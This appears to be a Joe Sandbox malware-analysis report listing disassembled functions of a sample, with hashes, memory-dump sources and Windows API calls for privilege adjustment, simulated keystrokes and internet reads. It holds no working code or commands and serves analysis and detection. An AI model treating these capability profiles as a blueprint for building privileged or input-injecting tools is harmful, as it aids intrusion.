Associated: 00000000.00000002.1655721731.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZsRFRjkt9q.jbxd

Similarity

API ID: Client$CursorDialogLongNtdllProc_RectScreenWindow
String ID:
API String ID: 1010295502-0
Opcode ID: 67ac9f4910a2dd253858acbbaaaecb0b8e2d9fabf8ddc0337399032a92a3f85b
Instruction ID: 8a38cf26b2289de6e14f6fa3ca0c761f9cf1d87495578927ec2939f6d18f8468
Opcode Fuzzy Hash: 67ac9f4910a2dd253858acbbaaaecb0b8e2d9fabf8ddc0337399032a92a3f85b
Instruction Fuzzy Hash: 0F114831A01029BFCB10DF95DC459EE77B9EF09308F40486AF901E7241D338AA92CBA9

Function 00413B70 Relevance: 5.9, Strings: 4, Instructions: 903COMMON

Download Yara Rule

Strings

L, xrefs: 0047701F
L, xrefs: 004140EC
@, xrefs: 00414176
L, xrefs: 004140A4

Memory Dump Source

Source File: 00000000.00000002.1655638769.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1655627677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655708564.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655721731.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZsRFRjkt9q.jbxd

Similarity

API ID: Exception@8Throwstd::exception::exception
String ID: @$ L$ L$ L
API String ID: 3728558374-1044802042
Opcode ID: c20c292156c628582c5f5d630bd0125284ede2cbf9ef2f8bfb15c20a718d53b1
Instruction ID: 699fc64d503734220e17f3bae4b4584c4c460a180cc37ed444e6cfd760d21436
Opcode Fuzzy Hash: c20c292156c628582c5f5d630bd0125284ede2cbf9ef2f8bfb15c20a718d53b1
Instruction Fuzzy Hash: A4729D74E042049FCF14DF94C481AEEB7B5EF48304F14806BE919AB391D779AE86CB99

Function 0041B11F Relevance: 4.9, APIs: 3, Instructions: 377nativeCOMMON

Download Yara Rule

APIs

Part of subcall function 0041B34E: GetWindowLongW.USER32(?,000000EB), ref: 0041B35F

NtdllDialogWndProc_W.USER32(?,?,?,?,?), ref: 0041B22F

Part of subcall function 0041B55D: NtdllDialogWndProc_W.USER32(?,00000020,?,00000000), ref: 0041B5A5

Memory Dump Source

Source File: 00000000.00000002.1655638769.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1655627677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655708564.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655721731.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZsRFRjkt9q.jbxd

Similarity

API ID: DialogNtdllProc_$LongWindow
String ID:
API String ID: 1155049231-0
Opcode ID: 7cf0e01d325c05872215fadf7fd1876a518e877bd8c73a3ee908c1b70c179c08
Instruction ID: 2271108539b8a3bcad80f9fb504b99785085641c9eb99831aee7754bc93f6997
Opcode Fuzzy Hash: 7cf0e01d325c05872215fadf7fd1876a518e877bd8c73a3ee908c1b70c179c08
Instruction Fuzzy Hash: FBA14C70114105BAD7246B2B9C4CDFF295CEB4A348B14829FF845D6292DB3C9C8692FF

Function 00454EB5 Relevance: 4.7, APIs: 3, Instructions: 155networkfileCOMMON

Download Yara Rule

APIs

InternetQueryDataAvailable.WININET(?,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,004543BF,00000000), ref: 00454FA6
InternetReadFile.WININET(00000001,00000000,00000001,00000001), ref: 00454FD2

Memory Dump Source

Source File: 00000000.00000002.1655638769.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1655627677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655708564.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655721731.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZsRFRjkt9q.jbxd

Similarity

API ID: Internet$AvailableDataFileQueryRead
String ID:
API String ID: 599397726-0
Opcode ID: b3b3a90c23168b91d967b868aba84b9d364afaca1416a805006fe33dafa1270d
Instruction ID: fc2494c5d1090c68671fb56a484849f12dd1ab69f199119c895c0e360fce0958
Opcode Fuzzy Hash: b3b3a90c23168b91d967b868aba84b9d364afaca1416a805006fe33dafa1270d
Instruction Fuzzy Hash: 5541FA72604205BFEB10DE85DC81EBF77BCEB8071EF10402FFA0566182D6799E89D668

Function 004077B0 Relevance: 4.6, APIs: 1, Strings: 1, Instructions: 1076COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00407921

Strings

\QK, xrefs: 00481028

Memory Dump Source

Source File: 00000000.00000002.1655638769.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1655627677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655708564.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655721731.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZsRFRjkt9q.jbxd

Similarity

API ID: _memmove
String ID: \QK
API String ID: 4104443479-3628726987
Opcode ID: 1c3005cb5f0da8ad46b7d66dd3d69215c08c54ff01ccddff8815d6f2f27610d0
Instruction ID: 87b044c4d6a9c987ae79e4dbe16587d7b3263cda5fc705f545ac5aa4043bf09a
Opcode Fuzzy Hash: 1c3005cb5f0da8ad46b7d66dd3d69215c08c54ff01ccddff8815d6f2f27610d0
Instruction Fuzzy Hash: E1A26D70E04219CFDB24DF58C4806ADB7B1FF48314F2581AAD859AB391D778AE82CF59

Function 0044E1FD Relevance: 4.6, APIs: 3, Instructions: 72COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 0044E20D
GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 0044E267
SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 0044E2B4

Memory Dump Source

Source File: 00000000.00000002.1655638769.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1655627677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655708564.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655721731.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZsRFRjkt9q.jbxd

Similarity

API ID: ErrorMode$DiskFreeSpace
String ID:
API String ID: 1682464887-0
Opcode ID: aafbfce44185f70870d8afe07bf37bb2e422d67a6981e374a3d90d68d9f72eff
Instruction ID: fcb039aee163e110a326b73cd7f822dd4e4f4f3e0c392ce8ae1e703b4088fde6
Opcode Fuzzy Hash: aafbfce44185f70870d8afe07bf37bb2e422d67a6981e374a3d90d68d9f72eff
Instruction Fuzzy Hash: 46219D35A00118EFDB00EFA5D884EEDBBB8FF48314F0484AAE905E7391DB359905CB58

Function 0043B134 Relevance: 4.6, APIs: 3, Instructions: 67COMMON

Download Yara Rule

APIs

Part of subcall function 0041F4EA: std::exception::exception.LIBCMT ref: 0041F51E
Part of subcall function 0041F4EA: __CxxThrowException@8.LIBCMT ref: 0041F533

LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0043B180
AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 0043B1AD
GetLastError.KERNEL32 ref: 0043B1BA

Memory Dump Source

Source File: 00000000.00000002.1655638769.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1655627677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655708564.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655721731.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZsRFRjkt9q.jbxd

Similarity

API ID: AdjustErrorException@8LastLookupPrivilegePrivilegesThrowTokenValuestd::exception::exception
String ID:
API String ID: 1922334811-0
Opcode ID: ee2bafe8e02b36d905e7548b02efa8f81da9ee796925be9efc932596bd8f7e1c
Instruction ID: d34e02cad222c35508b3879b7c877537743fe1e9ff263f18776d04d4c75f896d
Opcode Fuzzy Hash: ee2bafe8e02b36d905e7548b02efa8f81da9ee796925be9efc932596bd8f7e1c
Instruction Fuzzy Hash: E611C1B1900204AFE7189F54DCC5D6BB7BDFB48354B20892EF45697241DB74FC428B64

Function 00446606 Relevance: 4.6, APIs: 3, Instructions: 58fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 00446623
DeviceIoControl.KERNEL32(00000000,002D1400,?,0000000C,?,00000028,?,00000000), ref: 00446664
CloseHandle.KERNEL32(?,?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 0044666F

Memory Dump Source

Source File: 00000000.00000002.1655638769.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1655627677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655708564.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655721731.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZsRFRjkt9q.jbxd

Similarity

API ID: CloseControlCreateDeviceFileHandle
String ID:
API String ID: 33631002-0
Opcode ID: b8fd0c6e3683981e9efe52009cb6122e78433f0100f3abba2d1de88c949d02f3
Instruction ID: 1683307e1cd0e27eae8824ccb2fe6fa6d8dcf54692714181804254f96fd723f1
Opcode Fuzzy Hash: b8fd0c6e3683981e9efe52009cb6122e78433f0100f3abba2d1de88c949d02f3
Instruction Fuzzy Hash: 7E115271E01228BFEB109F98DC44BAF7BBCEB45710F114566F900E6290D7B05E018BA5

Function 004471FA Relevance: 4.5, APIs: 3, Instructions: 42memoryCOMMON

Download Yara Rule

APIs

AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 00447223
CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 0044723A
FreeSid.ADVAPI32(?), ref: 0044724A

Memory Dump Source

Source File: 00000000.00000002.1655638769.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1655627677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655708564.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655721731.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZsRFRjkt9q.jbxd

Similarity

API ID: AllocateCheckFreeInitializeMembershipToken
String ID:
API String ID: 3429775523-0
Opcode ID: c31be835109406b49b1e5b9f6e5b02849ad6eb7177ad8e108ba26c0d5b9f8f92
Instruction ID: 57aeaf038d2452313bcdb42708262a1761e9db82bc135c3fee38054b2013e197
Opcode Fuzzy Hash: c31be835109406b49b1e5b9f6e5b02849ad6eb7177ad8e108ba26c0d5b9f8f92
Instruction Fuzzy Hash: 3FF01D76E05309BFDF04DFE4DD89AEEBBB8FF09205F504869A602E21D1E3749A449B14

Function 0046F689 Relevance: 4.5, APIs: 3, Instructions: 32nativeCOMMON

Download Yara Rule

APIs

ClientToScreen.USER32(?,?), ref: 0046F6AC
6F59C5D0.COMCTL32(?,?,?,0047E52B,?,?,?,?,?), ref: 0046F6B8
NtdllDialogWndProc_W.USER32(?,00000200,?,?,?,?,?,?,?,0047E52B,?,?,?,?,?), ref: 0046F6D5

Memory Dump Source

Source File: 00000000.00000002.1655638769.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1655627677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655708564.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655721731.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZsRFRjkt9q.jbxd

Similarity

API ID: ClientDialogNtdllProc_Screen
String ID:
API String ID: 3420055661-0
Opcode ID: ea0786af17b4cd0f38be92faf1733503d70d8875982cc5fbaed642af2f307b0a
Instruction ID: 329565f1801bc6508298d442178efe249111606b84f3cc39ede7cf3b0cad1a7c
Opcode Fuzzy Hash: ea0786af17b4cd0f38be92faf1733503d70d8875982cc5fbaed642af2f307b0a
Instruction Fuzzy Hash: 8FF03A72811118FFEF049F85EC09DAE7FB8EF44311F14406AF901A21A1D7B1AA61EB64

Function 0041B385 Relevance: 3.1, APIs: 2, Instructions: 82nativeCOMMON

Download Yara Rule

APIs

Part of subcall function 0041B34E: GetWindowLongW.USER32(?,000000EB), ref: 0041B35F

Part of subcall function 0041B526: GetWindowLongW.USER32(?,000000EB), ref: 0041B537

GetParent.USER32(?), ref: 0047E5B2
NtdllDialogWndProc_W.USER32(?,00000133,?,?,?,?,?,?,?,?,0041B1E8,?,?,?,00000006,?), ref: 0047E62C

Memory Dump Source

Source File: 00000000.00000002.1655638769.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1655627677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655708564.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655721731.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZsRFRjkt9q.jbxd

Similarity

API ID: LongWindow$DialogNtdllParentProc_
String ID:
API String ID: 314495775-0
Opcode ID: 48083bcee2cb8bf5f98f595a6e47677bc41addfff6f063aa26393b94e8d9dff2
Instruction ID: 16fdb204e61d076021d0f7c2bdc7881a44bbef2f98279dcca7d868521124d4ef
Opcode Fuzzy Hash: 48083bcee2cb8bf5f98f595a6e47677bc41addfff6f063aa26393b94e8d9dff2
Instruction Fuzzy Hash: CB21A734701108AFCB108B69CC84DEA3796EB0A328F188257F9294B3F2D7389DA1D759

Function 0044F56F Relevance: 3.1, APIs: 2, Instructions: 52fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?), ref: 0044F599
FindClose.KERNEL32(00000000), ref: 0044F5C9

Memory Dump Source

Source File: 00000000.00000002.1655638769.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1655627677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655708564.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655721731.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZsRFRjkt9q.jbxd

Similarity

API ID: Find$CloseFileFirst
String ID:
API String ID: 2295610775-0
Opcode ID: f5ed6886b2520a8fc29f1761c1adbfca9a54a527dae0a705951b44cad1029618
Instruction ID: f1cd61f13b4ef61f2258d90b24d8a70c52a44234eaa919de3b45e9d4c70e834c
Opcode Fuzzy Hash: f5ed6886b2520a8fc29f1761c1adbfca9a54a527dae0a705951b44cad1029618
Instruction Fuzzy Hash: BF11C4316002009FD700EF29D849A2EB3E9FF84324F00892EF9A5D73D1DB74AD058B89

Function 0046F2D0 Relevance: 3.0, APIs: 2, Instructions: 46nativewindowCOMMON

Download Yara Rule

APIs

Part of subcall function 0041B34E: GetWindowLongW.USER32(?,000000EB), ref: 0041B35F

NtdllDialogWndProc_W.USER32(?,0000002B,?,?,?,?,?,?,?,0047E44F,?,?,?), ref: 0046F344

Part of subcall function 0041B526: GetWindowLongW.USER32(?,000000EB), ref: 0041B537

SendMessageW.USER32(?,00000401,00000000,00000000), ref: 0046F32A

Memory Dump Source

Source File: 00000000.00000002.1655638769.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1655627677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655708564.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655721731.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZsRFRjkt9q.jbxd

Similarity

API ID: LongWindow$DialogMessageNtdllProc_Send
String ID:
API String ID: 1273190321-0
Opcode ID: bb6c4490ee73c21cde42bdd608af98c038bcc12e769d6beb1e77d802ff23186d
Instruction ID: 516dd78ebb44b7d9e1b9e4ae8addb658f3fe2e7c36d1f254caf7ff01c5496d18
Opcode Fuzzy Hash: bb6c4490ee73c21cde42bdd608af98c038bcc12e769d6beb1e77d802ff23186d
Instruction Fuzzy Hash: 0201F531201204ABCB219F14EC44FAA3B66FB85324F14457AFC450B3E1D7359856DB5A

Function 0044CE7A Relevance: 3.0, APIs: 2, Instructions: 30windowCOMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(00000000,?,00000FFF,00000000,00000016,?,0045BE6A,?,?,00000000,?), ref: 0044CEA7
FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,00000016,?,0045BE6A,?,?,00000000,?), ref: 0044CEB9

Memory Dump Source

Source File: 00000000.00000002.1655638769.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1655627677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655708564.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655721731.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZsRFRjkt9q.jbxd

Similarity

API ID: ErrorFormatLastMessage
String ID:
API String ID: 3479602957-0
Opcode ID: e20ee315e4ec0e37730c00e99d2333a3c1edbc1e9039d31910fb98ae936f0a6e
Instruction ID: 38b4f1614884c6b466561351100e4d6413efc0af59102ccdb8bb2b0083ef7f16
Opcode Fuzzy Hash: e20ee315e4ec0e37730c00e99d2333a3c1edbc1e9039d31910fb98ae936f0a6e
Instruction Fuzzy Hash: 2CF0E231501229EBEB10EBA0DC88FEA736CBF08360F00416AF805D2181D7349A00CBA4

Function 0044411C Relevance: 3.0, APIs: 2, Instructions: 29keyboardCOMMON

Download Yara Rule

APIs

SendInput.USER32(00000001,?,0000001C,?,?,00000002), ref: 00444153
keybd_event.USER32(?,75C0C0D0,?,00000000), ref: 00444166

Memory Dump Source

Source File: 00000000.00000002.1655638769.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1655627677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655708564.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655721731.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZsRFRjkt9q.jbxd

Similarity

API ID: InputSendkeybd_event
String ID:
API String ID: 3536248340-0
Opcode ID: 785ef674d997d1a47d6e4a754bfc41e7bbea513b7be5b679f220edb18d586ab5
Instruction ID: fbbd680bab7d3c56282e5d27e33836289a13848d61ac285d335470ecaf5d92a6
Opcode Fuzzy Hash: 785ef674d997d1a47d6e4a754bfc41e7bbea513b7be5b679f220edb18d586ab5
Instruction Fuzzy Hash: CEF0307090434DAFEB059FA4C809BBE7FB4EF04305F04841AF96696191D779C616DFA4

Function 0043AB84 Relevance: 3.0, APIs: 2, Instructions: 22COMMON

Download Yara Rule

APIs

AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,0043ACC0), ref: 0043AB99
CloseHandle.KERNEL32(?,?,0043ACC0), ref: 0043ABAB

Memory Dump Source

Source File: 00000000.00000002.1655638769.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1655627677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655708564.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655721731.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZsRFRjkt9q.jbxd

Similarity

API ID: AdjustCloseHandlePrivilegesToken
String ID:
API String ID: 81990902-0
Opcode ID: 230adf680d109f85d0bc0309ea1f1aad25d48a23c798c6acaff7dd1004d355d0
Instruction ID: d05ca891511b1101e5b1e2ebcce66da84dd88e23b38a4ffdf4c9dfd1041b73b0
Opcode Fuzzy Hash: 230adf680d109f85d0bc0309ea1f1aad25d48a23c798c6acaff7dd1004d355d0
Instruction Fuzzy Hash: CEE0BF71000510AFE7252F55EC05DB7B7AAEB04324B10882EB99981471D7666C95AB54

Function 0046F7C3 Relevance: 3.0, APIs: 2, Instructions: 21nativeCOMMON

Download Yara Rule

APIs

GetWindowLongW.USER32(?,000000EC), ref: 0046F7CB
NtdllDialogWndProc_W.USER32(?,00000084,00000000,?,?,0047E4AA,?,?,?,?), ref: 0046F7F5

Memory Dump Source

Source File: 00000000.00000002.1655638769.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1655627677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655708564.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655721731.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZsRFRjkt9q.jbxd

Similarity

API ID: DialogLongNtdllProc_Window
String ID:
API String ID: 2065330234-0
Opcode ID: c4849f605def2ef0ab30cc079d07ee15f734b6b4dc472f98a71ce7c8340cf43b
Instruction ID: 2d8e7ca8232c10c9c2050598b96428e573b23f1fc03b5e9e43b19b384b8b0f15
Opcode Fuzzy Hash: c4849f605def2ef0ab30cc079d07ee15f734b6b4dc472f98a71ce7c8340cf43b
Instruction Fuzzy Hash: 7EE0C230104218BBEB140F09EC0AFBE3B18EB00B91F10852BF99B980E0E7B49891D768

Function 004281AC Relevance: 3.0, APIs: 2, Instructions: 8COMMONLIBRARYCODE

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(00000000,0000000E,00426DB3,-0000031A,?,?,00000001), ref: 004281B1
UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 004281BA

Memory Dump Source

Source File: 00000000.00000002.1655638769.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1655627677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655708564.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655721731.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZsRFRjkt9q.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 78bf435161179bd1ba802f90e724f00a28127df4a5bafb0e6b0ba1f8f28ab746
Instruction ID: cb4d899765201692ad32a28ec14761de77d0b6c524f12578595b3ebc96636b9c
Opcode Fuzzy Hash: 78bf435161179bd1ba802f90e724f00a28127df4a5bafb0e6b0ba1f8f28ab746
Instruction Fuzzy Hash: AEB09231445608ABDB002BA1EC09B5C7F68EB08652F004438FA0D440A18B7254109B9A

Function 0042D1B9 Relevance: 2.1, APIs: 1, Instructions: 645COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1655638769.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1655627677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655708564.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655721731.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZsRFRjkt9q.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5c728a019a251dc71abe01092ac8050e92b83019d64a38dfaf4092ab5920baa3
Instruction ID: 9386638fda9fd413a2794a4d8da2c2628334511d74af6c625826b4761eb94a98
Opcode Fuzzy Hash: 5c728a019a251dc71abe01092ac8050e92b83019d64a38dfaf4092ab5920baa3
Instruction Fuzzy Hash: FE323672E29F114DD7239634D922336A288AFB73D4F55D737F819B5AAAEB28C4C34104

Function 004096C0 Relevance: 2.1, APIs: 1, Instructions: 573COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1655638769.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

